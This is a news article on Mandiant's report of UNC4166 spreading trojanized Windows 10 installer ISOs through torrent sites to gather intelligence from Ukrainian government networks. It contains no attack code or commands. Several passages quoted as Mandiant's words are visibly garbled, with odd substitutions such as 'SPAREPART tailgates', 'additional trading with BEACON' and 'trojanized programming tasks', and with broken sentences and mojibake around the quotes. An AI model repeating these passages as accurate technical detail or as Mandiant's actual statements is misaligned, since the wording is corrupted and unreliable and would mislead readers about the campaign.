Software supply chain attacks are not slowing down, and researchers have uncovered a new example that targeted victims in Ukraine with malicious Windows setup files that were designed to harvest and exfiltrate sensitive data from compromised machines.
The campaign involved threat actors hosting the malicious files on torrent sites hosted in Russia and Ukraine. The files were disguised as legitimate Windows 10 installers and Mandiant researchers discovered the operation and attributed it to a new unknown group tracking as UNC4166. Although the actors are not known, Mandiant said some of the victim organizations overlapped with others that APT28 has previously targeted with destructive malware attacks. APT28, also known as Fancy Bear, is associated with Russia's GRU military intelligence unit.
The operation appears to have focused solely on information gathering, with no financial motivation, Mandiant said. In some of the compromised organizations, UNC4166 actors installed backdoors to maintain persistence.
โThe Trojan ISOs were hosted on Ukrainian and Russian language torrent sharing sites. Upon installation of the compromised software, the malware collects information about the compromised system and extracts it. On a subset of victims, additional tools are deployed to enable further intelligence gathering. In some cases, we discovered additional payloads that were likely deployed after initial reconnaissance, including STOWAWAY, BEACON, and SPAREPART tailgates,โ a Mandiant post on the operation reads.
Software supply chain attacks have become a tool of choice for some top-tier threat groups, especially those in the intelligence community. Compromising a piece of software or library and having the results trickle down through the supply chain can pay dividends for months or years. Mandiant said that this specific operation began several months ago and that one of the ISO files used in it was designed to disable security telemetry and also block automatic updates.
โThe ISO contained malicious scripting tasks that were altered and identified across multiple systems in three different Ukrainian organizations that targeted .onion TOR domains starting in mid-July 2022,โ Mandiant said.
โMandiant assesses that the threat actor performs an initial triage of the compromised devices, likely to determine if the victims were of interest. This triage is carried out using the trojanized programming tasks. In some cases, the threat actor may implement additional data theft capability or new persistence backdoors, likely for redundancy in the SPAREPART cases or to enable additional trading with BEACON and STOWAWAY.โ
Investigators said the operation was likely designed to collect information from Ukrainian government agencies.
โMandiant identified several devices within Ukrainian government networks containing malicious scheduling tasks that were communicating with a TOR website starting around July 12, 2022. These scheduling tasks act as a lightweight backdoor that retrieves tasks via requests HTTP to a given command and control (C2) server,โ Mandiant said.
โWe believe that the operation was intended for Ukrainian entities, due to the language pack used and the website used to distribute it. The use of ISO with Trojans is novel in espionage operations and the included anti-detection capabilities indicate that the actors behind this activity are security conscious and patient as the operation would have required significant time and resources to develop and wait for to install the ISO. in a network of interest.โ
In some cases, the compromised devices had more than one backdoor, and the attackers also attempted to download and install Tor Browser on some machines.
